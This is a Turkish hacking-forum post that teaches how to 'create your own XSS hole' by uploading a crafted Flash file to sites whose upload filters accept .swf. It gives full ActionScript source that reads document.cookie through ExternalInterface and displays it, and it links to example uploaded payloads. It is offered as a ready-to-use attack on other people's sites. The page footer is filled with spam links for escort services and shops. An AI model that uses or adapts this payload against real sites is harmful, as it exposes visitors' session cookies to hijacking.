⚠️ ÖNEMLİ DUYURU — KİŞİSEL VERİ VE YASADIŞI PAYLAŞIMLAR

Forumda kişisel bilgi (ad, adres, telefon vb.) veya yasa dışı içerik paylaşımı kesinlikle yasaktır. Bu tür paylaşımlar KVKK ve ilgili yasalar gereği suç teşkil eder.

Paylaşım yapan kullanıcıların hesapları kalıcı olarak kapatılacak ve resmî makamlara bildirilecektir. Forum yönetimi, yasal zorunluluklar gereği IP ve oturum kayıtlarını saklamaktadır.

Lütfen gizliliğe ve topluluk kurallarına dikkat ediniz. — Ajanlar.Org Yönetimi

XSS Açığı Yaratma

ReVaLaTioN

Yeni Üye
Katılım
31 Mar 2014
Mesajlar
22
Tepkime puanı
0
Puanları
0
Arkadaşlar çoğu site upload managerı .php .asp .html... benzeri şeyleri yasaklar filitreden geçirmez kabul ettiği dosyalar .pdf .doc .txt .swf vs olan siteler vardır.Madem sistemde açık yok upload seçenekleri bunlara izin veriyor bizde kendi açığımızı yaparız.Atıyorum bu verceğim kod .swf için yazılmış bir

kod

----------------------------------------------------------------------
package {
import flash.display.*;
import flash.text.*;
import flash.external.ExternalInterface;

public class xss extends Sprite {
public function xss() {
var cook:TextField = new TextField();
var res:String = ExternalInterface.call("function(){return document.cookie;}");
ExternalInterface.call("prompt(document.cookie)");
cook.multiline = true;
cook.wordWrap = true;
cook.autoSize = TextFieldAutoSize.LEFT;
cook.text = res;
addChild(cook);
}
}
}
-------------------------------------------------------------------
bu dosyayı .swf formatında sisteme attığınızda örnek olarak veriyorum siteyi http://swfchan.org/2335/xss.swf xss hatası alıyorsunuz böylelikle sistemde kendi açığınızı yaratıyorsunuz.

Ör:
http://www.ziddu.com/viewfile/22413513/xss.swf.html
http://swfchan.org/2335/xss.swf[/b]
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort Vitamin, Takviye ve Dermokozmetik Ürünler
Üst
Copyright® Ajanlar.org 2012